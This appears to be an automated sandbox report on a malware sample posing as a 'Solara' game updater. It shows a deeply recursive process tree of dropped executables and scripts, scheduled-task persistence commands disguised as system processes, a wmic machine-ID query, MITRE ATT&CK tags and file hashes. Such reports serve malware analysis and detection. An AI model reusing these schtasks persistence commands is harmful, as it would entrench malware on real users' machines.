C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "48⤵
- Loads dropped DLL
PID:316 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"49⤵PID:1984
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"46⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"47⤵PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"47⤵PID:856
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"48⤵PID:644
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "49⤵
- Loads dropped DLL
PID:2760 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"50⤵PID:1712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"47⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"48⤵PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"48⤵PID:572
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"49⤵PID:2168
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "50⤵
- Loads dropped DLL
PID:1856 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"51⤵PID:2240
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"48⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"49⤵PID:1080
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"49⤵PID:1296
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"50⤵PID:840
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "51⤵
- Loads dropped DLL
PID:2720 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"52⤵PID:776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"49⤵PID:1240
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"50⤵PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"50⤵PID:1924
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"51⤵PID:832
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "52⤵
- Loads dropped DLL
PID:1208 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"53⤵PID:1708
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"50⤵PID:348
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"51⤵PID:2068
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"52⤵PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"52⤵PID:2056
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"51⤵PID:2572
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"52⤵PID:1612
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "53⤵
- Loads dropped DLL
PID:2544 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"54⤵PID:2164
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"51⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"52⤵PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"52⤵PID:2444
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"53⤵PID:996
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "54⤵
- Loads dropped DLL
PID:2304 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"55⤵PID:1976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"52⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"53⤵PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"53⤵PID:976
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"54⤵PID:2888
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "55⤵
- Loads dropped DLL
PID:2532 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"56⤵PID:768
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"53⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"54⤵PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"54⤵PID:760
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"55⤵PID:2008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "56⤵
- Loads dropped DLL
PID:2868 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"57⤵PID:2864
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"54⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"55⤵PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"55⤵PID:2696
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"56⤵PID:2440
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "57⤵
- Loads dropped DLL
PID:2908 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"58⤵PID:756
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"55⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"56⤵PID:2548
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"57⤵PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"57⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"56⤵PID:2880
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"57⤵PID:2832
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "58⤵
- Loads dropped DLL
PID:2896 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"59⤵PID:536
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"56⤵PID:2596
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"57⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"58⤵PID:264
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"58⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"57⤵PID:2652
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"58⤵PID:2020
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "59⤵
- Loads dropped DLL
PID:2564 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"60⤵PID:2696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"57⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"58⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"59⤵PID:2056
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"59⤵PID:484
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid60⤵PID:1692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"58⤵PID:764
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"59⤵PID:884
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "60⤵
- Loads dropped DLL
PID:668 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"61⤵PID:2088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"58⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"59⤵PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"59⤵PID:1920
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"60⤵PID:2616
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"59⤵PID:2472
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"60⤵PID:2448
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"60⤵PID:864
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"61⤵PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"60⤵PID:584
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"61⤵PID:296
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"61⤵PID:2856
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"62⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"61⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"62⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"62⤵PID:1608
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"63⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"62⤵PID:2508
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"63⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"63⤵PID:756
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"64⤵PID:924
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"63⤵PID:2024
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"64⤵PID:1152
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"64⤵PID:1536
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"65⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"64⤵PID:2476
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"65⤵PID:796
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"65⤵PID:2740
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"66⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"65⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"66⤵PID:2500
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"66⤵PID:1480
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"67⤵PID:1852
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"66⤵PID:2572
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"67⤵PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"67⤵PID:2724
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"68⤵PID:2716
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"67⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"68⤵PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"68⤵PID:2756
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"69⤵PID:1208
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"68⤵PID:296
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"69⤵PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"69⤵PID:2860
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"70⤵PID:2028
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"69⤵PID:2444
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"70⤵PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"70⤵PID:2856
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"71⤵PID:2404
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"70⤵PID:584
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\hostNet\taskhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\hostNet\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\hostNet\taskhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Recovery\8f60a382-0d98-11ef-817d-5aba25856535\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Loader.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Loader" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Loader.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2644
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Loader.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 13 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1676
-
C:\Windows\system32\taskeng.exetaskeng.exe {916FEB13-D21F-486C-91A1-F1FED06CA314} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]1⤵PID:2208
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2136
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2704
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
139KB
MD58f77f8b13b914f358059e3f7b9ddab70
SHA1d406a28486b4dd881c454e526e149b98c0ec8462
SHA256c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad
-
Filesize
1KB
MD523d39dc9fcb1117b66cdc954e48fe166
SHA169c790280c51d4a2bd2b82dfa10f8048e77f1750
SHA2567ad24b526d9f97012db0c665d84dbb702943fdff6d7ec47ca6cd67ac2e44fc13
SHA5121d948debf3986b39d3ff8bb5ad56f11e4dc7efa14761a5e8befcb5ac4976980996fcea564908eca480ddee36d23c3b1299f7348bf55e27d0e899d1837b4c9d05
-
Filesize
231KB
MD5ff8f5c2670894f74456e534b34d6a8fe
SHA1e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff
-
Filesize
174B
MD5eac4a89eb75f4170ae1451510876abc5
SHA113164d0f330723564225ebc0c025ffc48eb1191a
SHA256b675222a52c57e8549ff5d4721a01f6a0b6a6ea9deb24453fb8fb02108c9e0de
SHA512475c9144280ed8aa9586e5f45fcdec9e3db0022ef3024376cce7116ed5ca99abe0ebbcebf1c6a6d8e4c490b852384ce06c261d08e227025585a45f987b486006
-
Filesize
60KB
MD528ff989c1d462f567aabb9c5ba76456b
SHA124be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA5122e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba
-
Filesize
335KB
MD5cc4c297af7f8f3f9be4101b8b882d2b0
SHA1f02bdeefa17cdee08613a700b1b212909140729b
SHA256c46d2e3be8a68dcbc3f8ebb88a8436d80b27a66822296e15320d2f4650e3f2f3
SHA51273a8659fe20fa38f66c1cd354456b29945c616a8554758a826e73ce22f759a8963274375e06fc3da9c041c48b5ee68601833e4b092f56809bd6ba5e000537837
-
Filesize
2.1MB
MD525daefc71be60b76cb49fc81424d768d
SHA148be475dd36b433d62d4f7fed9b4d81a90122dee
SHA2561b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD598d0f978ec621b8be134f920b9a1d0e1
SHA1b9cbdbbd61dc8aa8283598eeb6b933261224ef63
SHA256088f02467ed5d36e1236fb54e5ce7fc625415e6986f696e323ffcf31db107274
SHA512ee2a834c0078d07a37eb680b74c0a59ec6924ea648ce5a9fed724c4c4675dea82dbb7ee1397e671f2e25b7e135b28a3c8b9ef8667b7cca43ba46bf24d6c85246
-
Filesize
2KB
MD5577f27e6d74bd8c5b7b0371f2b1e991c
SHA1b334ccfe13792f82b698960cceaee2e690b85528
SHA2560ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c
-
Filesize
230B
MD592408a105526970fa12ef23225de61ae
SHA1bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
